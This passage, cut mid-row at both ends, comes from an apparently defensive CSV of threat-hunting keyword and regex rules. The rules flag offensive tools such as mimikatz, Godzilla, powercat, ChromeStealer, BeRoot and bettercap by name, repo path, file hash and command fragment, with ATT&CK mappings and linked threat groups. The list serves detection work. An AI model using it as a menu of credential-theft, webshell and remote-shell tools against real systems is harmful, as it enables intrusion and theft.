T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35772" "*beef-xss*",".{0,1000}beef\-xss.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35773" "*Beelogger*",".{0,1000}Beelogger.{0,1000}","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","N/A","10","1054","332","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z","35774" "*BeetleChunks/SpoolSploit*",".{0,1000}BeetleChunks\/SpoolSploit.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","35775" "*bef1d97b5fa30aea0ddffcc7275d34f13c54bf8b812326a37e958a314968d3af*",".{0,1000}bef1d97b5fa30aea0ddffcc7275d34f13c54bf8b812326a37e958a314968d3af.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35776" "*bef212d845d5f4f1ed2413b300548cc9181641fe773a25c7a0f7ea021a50bb40*",".{0,1000}bef212d845d5f4f1ed2413b300548cc9181641fe773a25c7a0f7ea021a50bb40.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35777" "*befbdaf08e78ab9ee8e418215b4a22102576ab472c73324ec59a6b890be1b5b3*",".{0,1000}befbdaf08e78ab9ee8e418215b4a22102576ab472c73324ec59a6b890be1b5b3.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","35781" "*before-create-implant-callback*",".{0,1000}before\-create\-implant\-callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35782" "*before-create-implant-io-bin*",".{0,1000}before\-create\-implant\-io\-bin.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35783" "*before-find-implant-chunks*",".{0,1000}before\-find\-implant\-chunks.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35784" "*BeichenDream/BadPotato*",".{0,1000}BeichenDream\/BadPotato.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege 
Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","35804" "*BeichenDream/Chunk-Proxy*",".{0,1000}BeichenDream\/Chunk\-Proxy.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","35805" "*BeichenDream/GodPotato*",".{0,1000}BeichenDream\/GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","35806" "*BeichenDream/Godzilla*",".{0,1000}BeichenDream\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35807" 
"*BeichenDream/SharpToken*",".{0,1000}BeichenDream\/SharpToken.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","35808" "*beichendream@gmail.com*",".{0,1000}beichendream\@gmail\.com.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","#email","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35809" "*Ben0xA/DoUCMe*",".{0,1000}Ben0xA\/DoUCMe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","35810" "*Benjamin Delpy - RDP Session Tradecraft*",".{0,1000}Benjamin\sDelpy\s\-\sRDP\sSession\sTradecraft.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","35811" "*benjamin@gentilkiwi.com*",".{0,1000}benjamin\@gentilkiwi\.com.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz 
default strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","#email","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35812" "*Bernardocarlos@tutanota.com*",".{0,1000}Bernardocarlos\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35813" "*BernKing/ChromeStealer*",".{0,1000}BernKing\/ChromeStealer.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","35814" "*beRoot.exe -*",".{0,1000}beRoot\.exe\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - 
Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35815" "*beroot.py -*",".{0,1000}beroot\.py\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35816" "*BeRoot-master*",".{0,1000}BeRoot\-master.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35817" "*besimorhino/powercat*",".{0,1000}besimorhino\/powercat.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","35819" "*BesoToken.exe list*",".{0,1000}BesoToken\.exe\slist.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","35820" "*BesoToken-master*",".{0,1000}BesoToken\-master.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","35821" "*besside-ng -W -v *",".{0,1000}besside\-ng\s\-W\s\-v\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","35822" "*best*phish her*",".{0,1000}best.{0,1000}phish\sher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","35823" "*bestcrypt2john.py*",".{0,1000}bestcrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35824" "*bestcryptve2john.py*",".{0,1000}bestcryptve2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35825" "*BetterBackdoor*",".{0,1000}BetterBackdoor.{0,1000}","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - 
TA0008","N/A","N/A","Persistence","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","N/A","3","280","86","2024-10-03T18:44:04Z","2019-07-29T14:45:24Z","35826" "*bettercap *",".{0,1000}bettercap\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35827" "*bettercap -iface eth0*",".{0,1000}bettercap\s\-iface\seth0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35828" "*bettercap.*",".{0,1000}bettercap\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35829" "*bettercap_.deb*",".{0,1000}bettercap_\.deb.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - 
T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35830" "*bettercap-master.zip*",".{0,1000}bettercap\-master\.zip.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35831" "*betterdefaultpasslist*",".{0,1000}betterdefaultpasslist.{0,1000}","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","N/A","7","605","134","2024-10-04T18:03:58Z","2016-09-24T16:21:44Z","35832" "*BetterSafetyKatz.*",".{0,1000}BetterSafetyKatz\..{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35833" "*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35834" "*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","35835" "*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - 
T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35836" "*better-sliver-master.zip*",".{0,1000}better\-sliver\-master\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","1","N/A","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","35837" "*BetterXencrypt.ps1*",".{0,1000}BetterXencrypt\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","35838" "*bf05f1f8aa31c121f30b013e644b75f8ec16c23c6041140408c76d07b003738c*",".{0,1000}bf05f1f8aa31c121f30b013e644b75f8ec16c23c6041140408c76d07b003738c.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35841" 
"*bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41*",".{0,1000}bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35842" "*bf36e85524877406694ccb4591a92b344b4e2778cedeba1dfac0ce1a30a4f80c*",".{0,1000}bf36e85524877406694ccb4591a92b344b4e2778cedeba1dfac0ce1a30a4f80c.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35849" "*bf3aed0e31aca1ff3d43724f9f3f8248396a9cb0bbf234c0830b6a4999570d16*",".{0,1000}bf3aed0e31aca1ff3d43724f9f3f8248396a9cb0bbf234c0830b6a4999570d16.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35850" "*bf40b50a1cb293cadf36aa0a2fe3309b682f08858a58bf6231042258e78a13dc*",".{0,1000}bf40b50a1cb293cadf36aa0a2fe3309b682f08858a58bf6231042258e78a13dc.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","35851" "*bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d*",".{0,1000}bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35852" "*BF45108E-1E43-486B-A71D-5426BBB041DB*",".{0,1000}BF45108E\-1E43\-486B\-A71D\-5426BBB041DB.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35853" "*bf4680186f616fbb0bf0a3cb01f520d8bca46d6100218ebb26de90b1ee3adaff*",".{0,1000}bf4680186f616fbb0bf0a3cb01f520d8bca46d6100218ebb26de90b1ee3adaff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35854" 
"*bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03*",".{0,1000}bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35855" "*bf47e463172e963f10b9c7e29995ef10b833b6d5cc0fd5a63bae1bd8d69410a1*",".{0,1000}bf47e463172e963f10b9c7e29995ef10b833b6d5cc0fd5a63bae1bd8d69410a1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35856" "*bf493db1ee23d91edc7d9085c6a37052e3d82c5a471cd6a9fdce92e401a89090*",".{0,1000}bf493db1ee23d91edc7d9085c6a37052e3d82c5a471cd6a9fdce92e401a89090.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35857" 
"*bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5*",".{0,1000}bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35858" "*bf52295b55072f08f18712abd36ed4c4c276c7affedb57e6e54d7fd2bc7e0b9c*",".{0,1000}bf52295b55072f08f18712abd36ed4c4c276c7affedb57e6e54d7fd2bc7e0b9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 